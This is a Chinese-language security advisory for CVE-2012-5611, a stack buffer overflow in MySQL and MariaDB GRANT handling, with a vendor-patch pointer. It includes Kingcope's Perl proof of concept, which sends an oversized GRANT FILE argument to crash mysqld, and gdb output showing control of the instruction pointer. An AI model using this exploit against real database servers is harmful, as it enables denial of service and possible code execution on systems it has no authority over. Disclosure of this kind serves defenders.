Oracle MySQL/MariaDB acl_get()和check_grant_db_routine()函数
发布日期:2012-12-01
更新日期:2012-12-05
受影响系统:
Oracle MySQL 5.5.19
MariaDB MariaDB 5.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56769
CVE(CAN) ID: CVE-2012-5611
Oracle MySQL Server是一个小型关系型数据库管理系统。
MySQL 5.5.19、5.1.53及其他版本、MariaDB 5.5.2.x、5.3.x、5.2.x、5.1.x内acl_get()、check_grant_db_routine()函数存在缓冲区溢出漏洞,具有MariaDB (MySQL)服务器低权限的用户可通过GRANT FILE命令的超长参数,造成mysqld崩溃或任意代码执行。
<*来源:vendor
链接:http://secunia.com/advisories/51427/
http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0005.html
http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0010.html
https://bugzilla.RedHat.com/show_bug.cgi?id=881064
https://mariadb.atlassian.net/browse/MDEV-3884
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
=for comment
MySQL Server exploitable stack based overrun
Ver 5.5.19-log for Linux and below (tested with Ver 5.1.53-log for SUSE-linux-gnu too)
unprivileged user (any account (anonymous account?), post auth)
as illustrated below the instruction pointer is overwritten with 0x41414141
bug found by Kingcope
this will yield a shell as the user 'mysql' when properly exploited
mysql@linux-lsd2:/root> gdb -c /var/lib/mysql/core
GNU gdb (GDB) SUSE (7.2-3.3)
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i586-suse-linux".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Missing separate debuginfo for the main executable file
Try: zypper install -C "debuginfo(build-id)=768fdbea8f1bf1f7cfb34c7f532f7dd0bdd76803"
[New Thread 8801]
[New Thread 8789]
[New Thread 8793]
[New Thread 8791]
[New Thread 8787]
[New Thread 8790]
[New Thread 8799]
[New Thread 8794]
[New Thread 8792]
[New Thread 8788]
[New Thread 8800]
[New Thread 8786]
[New Thread 8797]
[New Thread 8798]
[New Thread 8785]
[New Thread 8796]
[New Thread 8783]
Core was generated by `/usr/local/mysql/bin/mysqld --log=/tmp/mysqld.log'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb)
=cut
use strict;
use DBI();
# Connect to the database.
my $dbh = DBI->connect("DBI:mysql:database=test;host=192.168.2.3;",
"user", "secret",
{'RaiseError' => 1});
$a ="A" x 100000;
my $sth = $dbh->prepare("grant file on $a.* to 'user'\@'%' identified by 'secret';");
$sth->execute();
# Disconnect from the database.
$dbh->disconnect();
建议:
--------------------------------------------------------------------------------
厂商补丁:
MariaDB
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: